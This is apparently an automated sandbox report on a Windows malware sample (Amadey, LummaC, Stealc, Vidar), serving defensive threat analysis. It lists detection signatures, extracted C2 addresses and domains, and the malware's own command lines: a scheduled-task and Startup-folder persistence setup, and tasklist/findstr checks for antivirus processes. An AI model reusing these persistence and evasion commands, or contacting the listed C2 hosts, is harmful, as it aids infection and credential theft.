Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1546667
MD5:	aa78aafb0a66c7ddf96d87d24b5c3afc
SHA1:	29c96a9c0c5cb916ca8c09db1c4b2f7c3d4d7ffa
SHA256:	cd5327ade58bdcbd9e18407525a8c54ae311c97c512f0931173432f83d4d4d4a
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to start a terminal service

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4456 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AA78AAFB0A66C7DDF96D87D24B5C3AFC)

axplong.exe (PID: 3684 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: AA78AAFB0A66C7DDF96D87D24B5C3AFC)

axplong.exe (PID: 1620 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: AA78AAFB0A66C7DDF96D87D24B5C3AFC)

stealc_default2.exe (PID: 6660 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 68A99CF42959DC6406AF26E91D39F523)

Offnewhere.exe (PID: 2996 cmdline: "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe" MD5: 87E4E869971CEC9573811040F6140157)

splwow64.exe (PID: 1244 cmdline: "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe" MD5: 5D97C2475C8A4D52E140EF4650D1028B)

cmd.exe (PID: 412 cmdline: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2948 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1988 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 3408 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3672 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5572 cmdline: cmd /c md 197036 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 5104 cmdline: findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4908 cmdline: cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Jurisdiction.pif (PID: 4900 cmdline: Jurisdiction.pif T MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 3744 cmdline: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5744 cmdline: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 2164 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 2496 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

new_v8.exe (PID: 3340 cmdline: "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe" MD5: 5009B1EF6619ECA039925510D4FD51A1)

dac4554719.exe (PID: 396 cmdline: "C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe" MD5: 26D8D52BAC8F4615861F39E118EFA28D)

RegAsm.exe (PID: 2112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

c1a4d3220c.exe (PID: 6604 cmdline: "C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe" MD5: 4FD1ED99BAAA6E9AC510D0C468D900BD)

GOLD1234.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe" MD5: BDF3C509A0751D1697BA1B1B294FD579)

conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GOLD1234.exe (PID: 5676 cmdline: "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe" MD5: BDF3C509A0751D1697BA1B1B294FD579)

WerFault.exe (PID: 3228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 272 MD5: C31336C1EFC2CCB44B4326EA793040F2)

RDX123456.exe (PID: 6484 cmdline: "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe" MD5: FBA8F56206955304B2A6207D9F5E8032)

shop.exe (PID: 4112 cmdline: "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe" MD5: E3D038EE8743EEB4759105852F8C9973)

conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

shop.exe (PID: 4592 cmdline: "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe" MD5: E3D038EE8743EEB4759105852F8C9973)

shop.exe (PID: 1244 cmdline: "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe" MD5: E3D038EE8743EEB4759105852F8C9973)

shop.exe (PID: 3888 cmdline: "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe" MD5: E3D038EE8743EEB4759105852F8C9973)

0b44ippu.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe" MD5: 0F4AF03D2BA59B5C68066C95B41BFAD8)

f6f4816752.exe (PID: 5472 cmdline: "C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe" MD5: E71C5AEE12EE323FC4F40010437D4186)

wscript.exe (PID: 5548 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoCraft.scr (PID: 2908 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 2924 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoCraft.scr (PID: 6240 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: LummaC

{"C2 url": ["computeryrati.site", "goalyfeastz.site", "servicedny.site", "authorisev.site", "seallysl.site", "opposezmny.site", "faulteyotk.site", "contemteny.site", "dilemmadu.site"], "Build id": "4SD0y4--RLREBORN"}

Threatname: Vidar

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000021.00000003.3197330580.00000000012E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.2981305297.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3098957154.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3127124077.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3284579257.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1758351370.0000000000841000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1688467424.0000000004940000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000021.00000003.2995423907.00000000012F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3148528207.00000000012E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3126824181.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3178681399.000000000165E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3134934395.0000000001652000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3313436090.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3048486160.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.2894968481.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.2317904787.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000032.00000003.3170492805.0000000001657000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3237340411.0000000001646000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000000.2360564124.0000000000F11000.00000080.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001B.00000003.2732256893.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2754649701.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000000.2360588213.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000032.00000003.3237340411.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000032.00000003.3301700875.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2785879104.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3147801023.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3271528231.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000031.00000002.3149193410.00000000002F1000.00000040.00000001.01000000.0000001D.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000032.00000003.3091934423.000000000165E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3262647294.000000000165E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.2895449754.00000000012F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3266871838.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2804806549.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2732759831.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3314956401.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.2993220330.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.3156872332.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3274426173.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000021.00000003.3124289253.00000000012F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000021.00000003.3124530510.0000000001309000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3261461567.0000000001652000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3137226821.0000000001656000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3026321552.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1718075607.0000000005050000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000025.00000003.2954411937.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.2999744421.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2780168317.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.2996701233.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3086928884.0000000001652000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.2953800369.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2731444217.000000000124A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1729894674.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000032.00000003.3137274134.000000000165E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000031.00000003.3036164555.0000000004C00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000003.2930322210.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3161598485.0000000001655000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000021.00000003.3052777343.00000000012F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3099529730.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000032.00000003.3292216008.000000000165F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2877420998.000000000124E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6660	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6660	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 6660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6660	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: new_v8.exe PID: 3340	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: new_v8.exe PID: 3340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: new_v8.exe PID: 3340	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: c1a4d3220c.exe PID: 6604	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: c1a4d3220c.exe PID: 6604	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: c1a4d3220c.exe PID: 6604	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: GOLD1234.exe PID: 5676	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: GOLD1234.exe PID: 5676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GOLD1234.exe PID: 5676	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: f6f4816752.exe PID: 5472	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: f6f4816752.exe PID: 5472	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: shop.exe PID: 3888	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: shop.exe PID: 3888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: shop.exe PID: 3888	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 82 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.axplong.exe.840000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.stealc_default2.exe.f10000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.cd0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.0.stealc_default2.exe.f10000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
